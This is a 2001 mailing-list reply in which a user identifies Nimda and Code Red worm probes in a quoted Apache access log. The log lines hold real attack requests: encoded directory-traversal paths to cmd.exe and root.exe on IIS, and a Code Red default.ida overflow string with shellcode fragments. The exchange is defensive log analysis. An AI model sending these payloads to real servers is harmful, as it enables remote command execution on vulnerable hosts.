Re: Nimda?

Matthew Kennedy Fri, 21 Sep 2001 09:05:07 -0700
Looks like you have two types of scum in there: Nimda and one of the two
Red Code versions. I have a sed and awk combo using a named-fifo at home
that will filter out the junk and log offending IP numbers and
timestamps *on the fly*. 

I'm still not sure what to do that information though...

Matt

On Thu, 2001-09-20 at 16:27, Jason Montleon wrote:
> Is anyone else getting stuff like this in their access_log?  I have 2.6 MB
> built up since Tuesday of nothing but this garb
age and my cable modem has
> been blinking a lot of activity.  Am I to assume that this is Nimda?
> 
> Jason
> 
> ----------------------------------------------------------------------------
> ---------
> 65.96.30.122 - - [20/Sep/2001:16:54:07 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:08 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 281 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:11 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:12 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:15 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:16 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:16 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:17 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:17 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:18 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:18 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:19 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:20 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:23 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:24 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
> "-"
> 65.96.30.122 - - [20/Sep/2001:16:54:24 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:41 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:42 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 281 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:16:55:47 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.105.9 - - [20/Sep/2001:17:07:39 -0400] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 278 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 281 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:16 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 322 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 "-" "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-"
> "-"
> 65.96.123.110 - - [20/Sep/2001:17:09:17 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:01 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 283 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:02 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 281 "-" "-"
> 65.96.89.252 - - [20/Sep/2001:17:10:04 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
> 65.96.68.80 - - [20/Sep/2001:17:13:12 -0400] "-" 408 - "-" "-"
> ----------------------------------------------------------------------------
> ---------
> 
> 
> 
> _______________________________________________
> Seawolf-list mailing list
> [EMAIL PROTECTED]
> https://listman.redhat.com/mailman/listinfo/seawolf-list




_______________________________________________
Seawolf-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/seawolf-list
Re: Nimda?

Reply via email to
